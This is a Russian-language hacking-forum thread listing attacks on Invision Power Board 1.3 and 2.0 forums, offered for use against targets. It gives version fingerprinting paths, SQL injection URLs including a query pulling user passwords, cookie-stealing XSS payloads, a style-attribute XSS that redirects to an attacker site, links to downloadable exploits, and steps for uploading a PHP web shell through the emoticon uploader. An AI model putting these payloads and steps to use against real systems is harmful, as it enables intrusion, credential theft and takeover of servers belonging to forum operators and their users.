Общайся на любые темы!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Общайся на любые темы! » Хакинг / F.A.Q » Обзор уязвимостей форумов [Invision Power Board]

Обзор уязвимостей форумов [Invision Power Board]

Страница: 1

Сообщений 1 страница 9 из 9

1

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

Весь материал в этой статье был собран на просторах интернета
Invision Power Board 1.3 :
Раскритие пути :

Свернутый текст

http://[target]/forum/index.php?act=UserCP&CODE=photo

Для определения версии этого форума определяется наличием файлов и папок:

файлы: папки:
css.php /Skin/
conf_mime_types.php /ssi_templates/
ssi.php /html/emoticons/
show.php /fonts/

После того как убедились что версия форума Invision Power Board 1.3,
можно воспользоваться уязвимостями и сплоитами:

0

2

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

SQL-INJECTION:

Свернутый текст

http://[target]index.php?act=Search&nav=lv&CODE=show&
searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL]/*\

Свернутый текст

http://[target]/ssi.php?a=out&type=xml&f=0)[SQL]

Свернутый текст

http://[target]/forums/index.php?act=Members
&max_results=30&filter=1&sort_order=asc&
sort_key=name&st=[SQL]

0

3

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

XSS:

Свернутый текст

http://[target]/?c='><script>alert(window.document.url)</script><plain text>
http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext>
http://[target]/?act=SR&f='><script>alert(document.cookie)</script>
http://[target]/?showuser='><script>alert(document.cookie)</script>
http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>
http://[target]/index.php?s=&act=chat&pop=1;'><script>alert('xss')</script><plaintext>

0

4

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

Spl0its:

Свернутый текст

http://milw0rm.com/id.php?id=1036
http://rst.void.ru/download/r57ipb2.txt

0

5

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

Upload Shell:

Для загрузки шелла на сервер нужно пройти в АдминЦентр (Админку) и следовать
по этому пути:
Administration->Manage Emoticons->Upload an Emoticon to the emoticons directory
Далее нажимаем обзор и выберем шелл у себя на диске. Если у вас хватает прав на запись в дефолтовой папки смайлов то шелл загрузиться эту папку:

/forum/html/emoticons/shell.php

где shell.php имя вашего загруженного шелла.

0

6

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

Invision Power Board 2.0.*:

Для определения версии этого форума определяется наличием файлов:

Свернутый текст

/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php

После того как убедились что версии форума Invision Power Board 2.0.*,
можно воспользоваться уязвимостями и сплоитами:

0

7

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

SQL-INJECTION:

Свернутый текст

http://[target]/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

0

8

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

XSS:

Свернутый текст

COLOR=]`style
=background:url("javascrip t:document.location.replace('http://[attackersite]');")

0

9

  • Автор: --==>>SDS<<==--
  • ::: АйМ еСтЬ цАрЬ :::
  • --==>>SDS<<==--
  • Откуда: ПаЛаТа № 6
  • Зарегистрирован: 2007-02-15
  • Приглашений: 0
  • Сообщений: 16962
  • Уважение: +119
  • Позитив: +82
  • Пол: Мужской
  • Возраст: 37 [1987-04-08]
  • Провел на форуме:
    1 день 19 часов
  • Последний визит:
    2017-05-05 15:33:42

Spl0its:

Свернутый текст

http://milw0rm.com/id.php?id=648
http://rst.void.ru/download/r57ipb2.txt

0

Страница: 1

Вы здесь » Общайся на любые темы! » Хакинг / F.A.Q » Обзор уязвимостей форумов [Invision Power Board]